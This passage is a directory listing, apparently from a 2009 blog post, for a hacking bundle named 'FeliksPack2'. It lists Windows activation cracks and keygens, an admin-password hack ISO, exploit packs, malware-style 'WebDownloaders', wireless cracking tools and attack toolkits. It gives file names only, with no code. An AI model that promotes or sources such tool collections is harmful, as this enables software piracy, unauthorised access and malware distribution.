| | | Install.exe
| | | TimerStop64.sys
| | |
| | \---Old
| | TimerStop.sys
| | Vista Test Crack.exe
| |
| +---Vista Activator 2007
| | Vista Activator 2007.exe
| |
| +---Vista Automated Activation Crack v3.0
| | KEYs.txt
| | Vista Automated Activation Crack v3.0.exe
| |
| +---Vista Final Crack
| | | Vista Final Crack.txt
| | |
| | \---Windows
| | +---ServiceProfiles
| | | \---NetworkService
| | | \---AppData
| | | \---Roaming
| | | \---Microsoft
| | | \---SoftwareLicensing
| | | tokens.dat
| | |
| | \---System32
| | \---Licensing
| | \---pkeyconfig
| | pkeyconfig.xrm-ms
| |
| +---VISTA KEYS
| | VISTA KEYS.txt
| |
| +---Vista Loader
| | Vista Loader.exe
| |
| +---Windows Vista Activation 1.3
| | Windows.Vista.Activation.Installer.1.3.exe
| |
| +---Windows Vista Activator
| | Windows Vista Activator.exe
| | Windows Vista KEY.txt
| |
| +---Windows Vista Activator 2
| | Windows Vista Activator 2.EXE
| |
| +---Windows Vista StopTime Crack
| | 1.bat
| | 2.bat
| | check.bat
| | Readme.txt
| | Windows Vista Crack.exe
| |
| +---x64 x32 Fix
| | \---Windows
| | +---ServiceProfiles
| | | \---NetworkService
| | | \---AppData
| | | \---Roaming
| | | \---Microsoft
| | | \---SoftwareLicensing
| | | tokens.dat
| | |
| | \---System32
| | \---Licensing
| | \---pkeyconfig
| | pkeyconfig.xrm-ms
| |
| \---XP
| | Key Finder.exe
| | OS Update Hack.exe
| | Random Serial Numbers.exe
| | RemoveWGA.exe
| | Reset.exe
| | RockXP 4.exe
| | Server 2003.exe
| | TweakNT.exe
| | WGA Fix.exe
| | Win 4 iN 1.exe
| | Win 95-2000.exe
| | Win XP Activator.exe
| | Windows 2003 & XP Anti Product Activation Crack 1.1.exe
| | Windows Xp Genuiner.exe
| | Windows XP KeyGen.exe
| | Windows XP Product ID Changer.exe
| | Windows XP-NET-2003 Product Key Changer.exe
| | WinXP Activation 1.1.exe
| | WinXP Corp. Key Changer 2.exe
| | WinXP_Validate_keys.exe
| | Xp Genuiner.reg
| | XP password Manager.exe
| | XPPID.exe
| | xpy.exe
| |
| +---Windows Admin password Hack
| | README.txt
| | Windows Admin password Hack.iso
| |
| \---Windows Update Fix
| Corp Windows Update Fix.reg
| regupdate.vbe
|
+---FeliksPack2 - Vulnerabilityes Scanners
| 950_sploit.rar
| Vulnerabilityes Scanners & Exploiters Pack v1.10.zip
| vulnerabilty.rar
|
+---FeliksPack2 - WebDownloaders
| crypticdlr.zip
| dwc.zip
| Dyn-Dv1.zip
| fedownloader_20.zip
| ftrdl.zip
| fwebd10.zip
| hookbyter.zip
| Passive Terror v1.3 Final Edition.zip
| silentassasinv20beta.zip
| skddownloader.zip
| toxic11.zip
| troll.zip
|
+---FeliksPack2 - Wirless
| abappwd.zip
| aerosol.zip
| AIO Wireless Hack Toolz.exe
| aircrack-ng-0.5.tar.gz
| aircrack.zip
| aircrackng.zip
| aircrackpack.zip
| aire.zip
| airsnort.zip
| aptools.zip
| asleap.zip
| cowpatty.zip
| EasyWifiRadar.zip
| Hotspotter-0.4.tar.gz
| kismet-2005-08-R1.tar.tar
| kismet-2006-04-R1.tar.gz
| netstumbler.zip
| Wellenreiter-v1.9.tar.gz
| weplab.zip
| wepwedgie-alpha-0.1.0.tar.gz
| wireshark-setup-0.99.5.zip
|
\---FeliksPask2 - Security Scanners
attacktoolkit.zip
legion_211.zip
NStealth-Free-5-8b103.zip
2009年10月16日星期五
订阅:
博文 (Atom)
博文
